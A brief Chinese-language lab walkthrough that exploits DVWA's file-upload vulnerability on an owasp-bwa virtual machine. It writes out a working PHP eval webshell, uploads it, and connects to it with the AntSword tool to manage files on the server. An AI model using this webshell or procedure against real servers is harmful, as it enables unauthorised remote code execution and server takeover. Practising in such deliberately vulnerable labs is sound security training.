蚁剑+DVWA(文件上传漏洞Upload)
0x00 工具
虚拟机:owasp-bwa
主机:windows10
蚁剑 AntSword
0x01 文件上传漏洞(Upload)
第一步:登入DVWA
注:这里使用的是low等级,毕竟目的是演示如何蚁剑的连接
第二步:准备hack.php
<?php
@eval($_POST['hack'])
?>
第三步:从DVWA上传hack.php
显示上传成功!
接下来我们来owasp-bwa服务器的目录下检查是否含有hack.php
cd /var/www/dvwa/hackable/uploads
ls
看到这就很 nice !
第四步:使用蚁剑来连接获得webshell
在空白处 右键 -->添加数据
url处理
http://192.168.47.130/dvwa/vulnerabilities/upload/#
../../hackable/uploads/hack.php
把上面的url和文件路径拼在一起 记得去掉url后面的 #
然后得到下面的新 url 并打开
http://192.168.47.130/dvwa/vulnerabilities/upload/../../hackable/uploads/hack.php
打开后url变成:http://192.168.47.130/dvwa/hackable/uploads/hack.php
这就是蚁剑填入的链接
连接密码是指 hack.php 里 通过POST提交的 数据 即 hack
<?php
@eval($_POST['hack'])
?>
编码器一般选择 chr 就行了
点击 添加 然后 右键 添加的项目
接下来我们可以对目标服务器进行相关操作了!!!
e.g. 文件管理
我们可以试着去新建个文件试试 test.txt 然后到服务器的目录下检测
创建成功!!!
至此蚁剑通过DVWA文件上传漏洞的进行的连接就完成了